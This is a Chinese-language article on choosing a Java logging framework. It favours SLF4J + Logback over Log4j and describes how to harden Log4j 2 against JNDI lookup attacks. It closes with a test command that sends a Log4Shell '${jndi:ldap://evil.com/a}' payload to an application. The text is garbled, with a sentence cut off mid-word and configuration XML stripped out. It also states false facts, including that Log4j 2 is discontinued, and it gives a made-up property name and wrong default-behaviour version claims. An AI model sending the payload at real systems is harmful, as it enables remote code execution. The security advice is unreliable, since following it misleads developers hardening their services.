应优先选用 SLF4J + Logback 组合,因其轻量、稳定、无反射风险且为 Spring Boot 默认方案;Log4j 2.x 已停更,旧版存在严重 RCE 漏洞,Log4j 1.x 已终止维护且功能落后。
Log4j 2.x 已不再被推荐用于新项目,log4j-core 在 2.17.0 之前存在严
slf4j-api + logback-classic,或至少使用 Log4j 2.20.0+(启用 log4j2.formatMsgNoLookups=true 并禁用 JNDI)。
为什么不要直接用 Log4j 1.x 或旧版 Log4j 2
Log4j 1.x 已于 2015 年 EOL,不支持异步日志、Lambda 延迟求值、现代配置格式;Log4j 2.0–2.19.0 存在多个高危反序列化与 lookup 漏洞,即使加 -Dlog4j2.formatMsgNoLookups=true 也不能完全规避(如 CVE-2025-45046)。生产环境若强制使用旧版,必须配合字节码增强(如 log4j-jndi-be-gone)或 JVM 参数封锁 JNDI 协议。
- Log4j 1.x:
org.apache.log4j.Logger无法桥接到 SLF4J,log4j.properties不支持 YAML/JSON - Log4j 2.17.0 以下:默认开启
${jndi:ldap://}解析,任意日志内容含该字符串即可能触发 RCE - Log4j 2.17.0+ 仍需额外配置
log4j2.noFormatMsgLookup=true(2.20.0 后改名为log4j2.formatMsgNoLookups)才安全
推荐方案:SLF4J + Logback(Maven 依赖写法)
这是 Spring Boot 默认方案,也是目前最轻量、稳定、可扩展的日志组合。SLF4J 是门面接口,Logback 是原生实现,无需桥接器,无反射调用风险。
org.slf4j slf4j-api2.0.12 ch.qos.logback logback-classic1.4.14
注意:logback-classic 会自动拉取 logback-core 和 slf4j-api,无需重复声明。若项目中已存在其他日志实现(如 Log4j 2),需排除其传递依赖,否则运行时可能报 Multiple bindings 警告。
logback.xml 配置要点(避免常见挂起和丢失日志)
logback.xml 必须放在 src/main/resources/ 下,且根元素为 或使用 AsyncAppender。
- 控制台输出中文乱码:在
UTF-8 - 滚动文件不生效:确保
fileNamePattern含日期占位符(如log.%d{yyyy-MM-dd}.%i.log),且 - 日志级别不生效:检查
additivity="false"意外屏蔽 - 启动卡住:避免在
中设置过大的maxFileSize(如1GB)且未配maxHistory,会导致首次归档扫描耗时极长
如果必须用 Log4j 2(如遗留系统升级受限)
仅限 Log4j 2.20.0+,且必须同时满足三项:
- 依赖版本明确指定
2.20.0 - JVM 启动参数加入:
-Dlog4j2.formatMsgNoLookups=true -Dlog4j2.enableDirectEncoders=true -
log4j2.xml中禁用全部 lookup:移除所有${开头的变量引用,或改用${env:HOME}这类白名单类型(2.20.0+ 默认只允许env,sys,java)
示例最小安全配置片段:
真正麻烦的从来不是“怎么配”,而是“怎么确认它没在偷偷解析 JNDI”——建议上线前用 curl -v 'http://your-app/log?msg=${jndi:ldap://evil.com/a}' 测试是否仍有 DNS 请求发出。
